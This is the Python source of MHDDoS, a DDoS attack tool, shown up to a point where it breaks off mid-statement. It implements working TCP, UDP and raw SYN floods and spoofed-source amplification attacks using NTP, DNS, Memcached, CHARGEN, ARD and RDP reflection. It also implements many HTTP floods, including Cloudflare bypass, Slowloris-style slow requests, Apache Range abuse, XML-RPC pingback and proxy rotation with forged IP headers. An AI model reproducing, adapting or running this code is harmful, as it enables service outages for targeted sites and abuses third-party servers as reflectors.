#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from contextlib import suppress
from itertools import cycle
from json import load
from logging import getLogger, shutdown, basicConfig
from math import trunc, log2
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from random import randint, choice as randchoice
from socket import (IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, TCP_NODELAY, SOCK_STREAM, AF_INET, socket,
SOCK_DGRAM, SOCK_RAW, gethostname, gethostbyname)
from ssl import SSLContext, create_default_context, CERT_NONE
from sys import argv, exit as _exit
from threading import Thread, Event, Lock
from time import sleep, time
from typing import Set, List, Any, Tuple
from urllib import parse
from PyRoxy import Proxy, Tools as ProxyTools, ProxyUtiles, ProxyType, ProxyChecker
from certifi import where
from cfscrape import create_scraper
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import process_iter, net_io_counters, virtual_memory, cpu_percent
from requests import get, Session, exceptions, Response
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s', datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__ = "2.1 SNAPSHOT"
__dir__ = Path(__file__).parent
__ip__ = get('http://ip.42.pl/raw').text
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS",
"DYN", "SLOW", "HEAD", "NULL", "COOKIE", "PPS",
"EVEN", "GSB", "DGB", "AVB", "CFBUAM", "APACHE",
"XMLRPC", "BOT"}
LAYER4_METHODS: Set[str] = {"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM",
"NTP", "DNS", "ARD", "CHAR", "RDP"}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = ["Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"]
class Counter(object):
def __init__(self, value=0):
self._value = RawValue('i', value)
self._lock = Lock()
def __iadd__(self, value):
with self._lock:
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
with self._lock:
self._value.value = value
return self
requests_sent = Counter()
bytes_sent = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = ["B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum([abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}' for key, value in res.request.headers.items()))
return size
# noinspection PyBroadException
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
def __init__(self, target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None):
super().__init__(daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
with suppress(Exception):
while self._synevent.is_set():
self.SENT_FLOOD()
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "RDP":
self._amp_payload = (b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
global bytes_sent, requests_sent
try:
with socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
while s.send(randbytes(1024)):
requests_sent += 1
bytes_sent += 1024
except Exception:
s.close()
def MINECRAFT(self) -> None:
global bytes_sent, requests_sent
payload = b'\x0f\x1f0\t' + self._target[0].encode() + b'\x0fA'
try:
with socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
s.send(payload)
bytes_sent += len(payload)
while s.send(b'\x01'):
s.send(b'\x00')
requests_sent += 2
bytes_sent += 2
except Exception:
s.close()
def UDP(self) -> None:
global bytes_sent, requests_sent
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto(randbytes(1024), self._target):
requests_sent += 1
bytes_sent += 1024
except Exception:
s.close()
def SYN(self) -> None:
global bytes_sent, requests_sent
payload = self._genrate_syn()
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(payload, self._target):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def AMP(self) -> None:
global bytes_sent, requests_sent
payload = next(self._amp_payloads)
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(*payload):
requests_sent += 1
bytes_sent += len(payload[0])
except Exception:
s.close()
def VSE(self) -> None:
global bytes_sent, requests_sent
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto(payload, self._target):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self, target: URL, host: str, method: str = "GET", rpc: int = 1,
synevent: Event = None, useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
super().__init__(daemon=True)
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = ["https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0']
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/1.1\r\n" % (self._req_type, target.raw_path_qs)
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
with suppress(Exception):
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
payload: str = ""
payload += "X-Forwarded-Proto: Http\r\n"
payload += f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
payload += f"Via: {spoof}\r\n"
payload += f"Client-IP: {spoof}\r\n"
payload += f'X-Forwarded-For: {spoof}\r\n'
payload += f'Real-IP: {spoof}\r\n'
return payload
def generate_payload(self, other: str = None) -> bytes:
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += other if other else ""
return str.encode(f"{payload}\r\n")
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket()
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock, server_hostname=self._target.host, server_side=False,
do_handshake_on_connect=True, suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
payload: str = ""
payload += f"User-Agent: {randchoice(self._useragents)}\r\n"
payload += f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n"
payload += self.SpoofIP
return payload
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"STRESS", "DYN", "SLOW", "PPS", "APACHE"
"BOT"} \
else "POST" if {method.upper()} & {"POST", "XMLRPC"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload(("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}'
) % ProxyTools.Random.rand_str(32))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def STRESS(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload((f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}'
) % ProxyTools.Random.rand_str(512))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def COOKIES(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload("Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" % (randint(1000, 99999),
ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def APACHE(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload("Range: bytes=0-,%s" % ",".join("5-%d" % i for i in range(1, 1024)))
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def XMLRPC(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload(("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
""
"pingback.ping"
"%s"
"%s"
""
) % (ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def PPS(self) -> None:
global bytes_sent, requests_sent
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(self._defaultpayload):
requests_sent += 1
bytes_sent += len(self._defaultpayload)
except Exception:
s.close()
def GET(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def BOT(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"
), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9), ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n"
)
try:
with self.open_connection() as s:
s.send(p1)
s.send(p2)
bytes_sent += len(p1 + p2)
requests_sent += 2
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def EVEN(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
while s.send(payload) and s.recv(1):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def OVH(self) -> None:
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def CFB(self):
pro = None
global bytes_sent, requests_sent
if self._proxies:
pro = randchoice(self._proxies)
try:
with create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res:
requests_sent += 1
bytes_sent += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
requests_sent += 1
bytes_sent += Tools.sizeOfRequest(res)
except Exception:
s.close()
def CFBUAM(self):
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
sleep(5.01)
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def AVB(self):
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def DGB(self):
global bytes_sent, requests_sent
with create_scraper() as s:
try:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res:
requests_sent += 1
bytes_sent += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
requests_sent += 1
bytes_sent += Tools.sizeOfRequest(res)
except Exception:
s.close()
def DYN(self):
global bytes_sent, requests_sent
payload: str | bytes = self._payload
payload += "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority)
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def BYPASS(self):
global requests_sent, bytes_sent
pro = None
if self._proxies:
pro = randchoice(self._proxies)
try:
with Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res:
requests_sent += 1
bytes_sent += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
requests_sent += 1
bytes_sent += Tools.sizeOfRequest(res)
except Exception:
s.close()
def GSB(self):
global bytes_sent, requests_sent
payload = "%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type, self._target.raw_path_qs, ProxyTools.Random.rand_str(6))
payload = (payload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def NULL(self) -> None:
global bytes_sent, requests_sent
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += "User-Agent: null\r\n"
payload += "Referrer: null\r\n"
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
requests_sent += 1
bytes_sent += len(payload)
except Exception:
s.close()
def SLOW(self):
global bytes_sent, requests_sent
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
while s.send(payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
if s.send(keep):
sleep(self._rpc / 15)
requests_sent += 1
bytes_sent += len(keep)
break
except Exception:
s.close()
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST": self.SENT_FLOOD = self.POST
if name == "CFB": self.SENT_FLOOD = self.CFB
if name == "CFBUAM": self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC": self.SENT_FLOOD = self.XMLRPC
if name == "BOT": self.SENT_FLOOD = self.BOT
if name == "APACHE": self.SENT_FLOOD = self.APACHE
if name == "BYPASS": self.SENT_FLOOD = self.BYPASS
if name == "OVH": self.SENT_FLOOD = self.OVH
if name == "AVB": self.SENT_FLOOD = self.AVB
if name == "STRESS": self.SENT_FLOOD = self.STRESS
if name == "DYN": self.SENT_FLOOD = self.DYN
if name == "SLOW": self.SENT_FLOOD = self.SLOW
if name == "GSB": self.SENT_FLOOD = self.GSB
if name == "NULL": self.SENT_FLOOD = self.NULL
if name == "COOKIE": self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (self._defaultpayload + "Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
proxes: Set[Proxy] = set()
lock = Lock()
logger.info("Downloading Proxies form %d Providers" % len(cf["proxy-providers"]))
for provider in cf["proxy-providers"]:
if provider["type"] != Proxy_type and Proxy_type != 0: continue
typ = ProxyType.stringToProxyType(str(provider["type"]))
logger.debug("Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" % (provider["url"], typ.name, provider["timeout"]))
ProxyManager.download(provider, proxes, lock, typ)
return proxes
@staticmethod
def download(provider, proxes: Set[Proxy], threadLock: Lock, proxy_type: ProxyType) -> Any:
with suppress(TimeoutError, exceptions.ConnectionError, exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(data.splitlines(), proxy_type):
with threadLock:
proxes.add(proxy)
except Exception as e:
logger.info('Download Proxy Error: %s' % (e.__str__() or e.__repr__()))
class ToolsConsole:
METHODS = {"INFO", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") % (Tools.humanbytes(t[0]),
Tools.humanbytes(t[1]),
Tools.humanformat(t[2]),
Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7],
str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') % (r.status_code,
"ONLINE" if r.status_code <= 500 else "OFFLINE"))
return
print("Error! ")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://', '').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n"
) % (info["country"],
info["city"],
info["org"],
info["isp"],
info["region"]))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://', '').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n'
) % (r.address,
r.avg_rtt,
r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print(('* Coded By MH_ProDev For Better Stresser\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' Layer7: python3 %s \n'
' Layer4: python3 %s \n'
'\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' Layer7: python3 %s %s %s %s %s proxy.txt %s %s\n'
' Layer4: python3 %s %s %s %s %s') % (argv[0], argv[0],
", ".join(Methods.LAYER4_METHODS),
len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS),
len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0],
randchoice([*Methods.LAYER7_METHODS]),
"https://example.com",
randchoice([4, 5, 1, 0]),
randint(850, 1000),
randint(50, 100),
randint(1000, 3600),
argv[0],
randchoice([*Methods.LAYER4_METHODS]),
"8.8.8.8:80",
randint(850, 1000),
randint(1000, 3600)
))
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP": raise IndexError()
if one == "TOOLS": ToolsConsole.runConsole()
if one == "STOP": ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" % ", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
urlraw = argv[2].strip()
if not urlraw.startswith("http"): urlraw = "http://" + urlraw
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" / argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
proxies: Any = set()
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists(): exit("The Useragent file doesn't exist ")
if not referers_li.exists(): exit("The Referer file doesn't exist ")
uagents = set(a.strip() for a in useragent_li.open("r+").readlines())
referers = set(a.strip() for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if proxy_ty not in {4, 5, 1, 0}: exit("Socks Type Not Found [4, 5, 1, 0]")
if threads > 1000: logger.warning("thread is higher than 1000")
if rpc > 100: logger.warning("RPC (Request Pre Connection) is higher than 100")
if not proxy_li.exists():
if rpc > 100: logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(f"{len(Proxies):,} Proxies are getting checked, this may take awhile !")
Proxies = ProxyChecker.checkAll(Proxies, url.human_repr(), 1, threads)
if not Proxies: exit(
"Proxy Check failed, Your network may be the problem | The target may not be"
" available.")
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if not proxies:
